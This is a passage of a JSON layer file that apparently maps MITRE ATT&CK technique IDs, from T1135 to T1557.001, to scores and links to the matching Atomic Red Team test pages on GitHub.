Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1222","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1491","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1547.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"}]},{"techniqueID":"T1548.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1550","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1556.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1556","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557.001","score":100,"enabled":true,"links":[{"label":"View 
